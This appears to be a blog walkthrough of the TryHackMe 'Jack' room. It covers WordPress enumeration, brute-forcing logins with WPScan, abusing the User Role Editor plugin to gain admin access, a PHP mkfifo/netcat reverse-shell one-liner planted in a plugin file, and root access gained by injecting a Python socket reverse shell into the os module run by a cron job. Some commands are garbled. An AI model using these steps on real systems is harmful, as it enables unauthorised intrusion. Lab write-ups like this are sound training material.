TryHackme — Jack Write up

Shamsher khan
5 min readMay 21, 2021

By Shamsher khna This is a Writeup of Tryhackme room “Jack”


First, we will connect to the VPN. If you are not familiar with the process go through this room

Once we are connected we will deploy the machine (note that in the room description there is a request for you to add jack.thm to /etc/hosts):

Let’s add jack.thm to the /etc/hosts file you can use leafpad or vim for edit this file


nmap -T4 -sS -sC -sV jack.thm

We have Two Ports SSH =21 and HTTP=80 without username and password we can’t login through SSH. So Enumerate Port 80 Open Browser and search


From the nmap results, we can see the /wp-admin in the results which takes us to the WordPress login form, but we don’t have any credentials yet.

Using WPScan

wpscan - url jack.thm -e u

We can see XML-RPS is enabled which gives us few vulnerabilities A blog post here by +Bilal Rizwan

Users Found

With WPScan we know that the server is running WordPress 5.3.2 with XML-RPC enabled and has three users. With this information we will move on to exploiting WordPress.

Brute Force WordPress Login

We paste all three users in text file

echo user1 > users.txt;echo user2 >> users.txt;echo user3 >> users.txt#wpscan -U users.txt -P rockyou.txt - url http://jack.thm

We have a valid username and password login to WordPress.

At this point, I had to take a hint, because there were no plugins found via wpscan, and this user wasn’t an admin user, So We will use Searchsploit

searchsploit Plugin User role editor

Download exploit

searchsploit -m 44595

This exploit tells that send a modified post request specifying the users privileges using ure_other_roles as part of updating a users profile

open Burp Suite, set the proxy on your browser and turn on intercept:

We can see that the section of the post request that may be vulnerable:

Now Compare this to the ruby module we download using searchsploit we can see that all parameter in the post request are set except for ure_other_roles:

So, let’s try adding this to our request and see if it does work:


We modify our request and click forward in Burp:

When We forward our request . We have administrator access to WordPress and we can see under the plugins tab the vulnerable User Role Editor Plugin Version 4.24:

Getting a Shell

Go to plugin editor and paste this one linear code in Akismet.php

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4444 >/tmp/f") ?>

now click on update file

now click on Activate to get reverse-shell

We start our Listener

We have user www-data ,which has low privilege. We need to Escalate user jack .Checking out the reminder.txt file, we noticed something related to backups, so we do some enumeration and find a backups folder with an ssh key which we can use to login as jack.

List of files under /var/backups

We can login as user jack after changing the permissions of the id_rsa to 600

Then we try SSH:

ssh -i id_rsa jack@jack.thm


Privilege Escalation to Root

Download pspy64


Transfer this file into jack’s /tmp folder to run

Using pspy to monitor the processes that are running, we notice that root has a cronjob running every minute. The script is located at /opt/statuscheck/

The contents of the script shows that it imports the python module os

With all that information we discovered, it’s time to do some further enumeration. We noticed that the user jack is part of the family group which has the ability to write on any files under the /usr/lib/python2.7/ directory. This is good because the os module is under that directory and our user jack has write access to that module.

www-data@jack:/home/jack$ id jack
id jack
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)

To exploit this, we edit the /usr/lib/python2.7/ module and add the following reverse shell all the way at the end

import socket
import ptys=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.X.X", 4444))

We start a listener and wait 2 minute for the cronjob to run, and we get a root shell.

Thanks to the machine creator/s for this challenge.

follow on LinkedIn Instagram Twitter

Written by Shamsher khan

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!



Shamsher khan

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer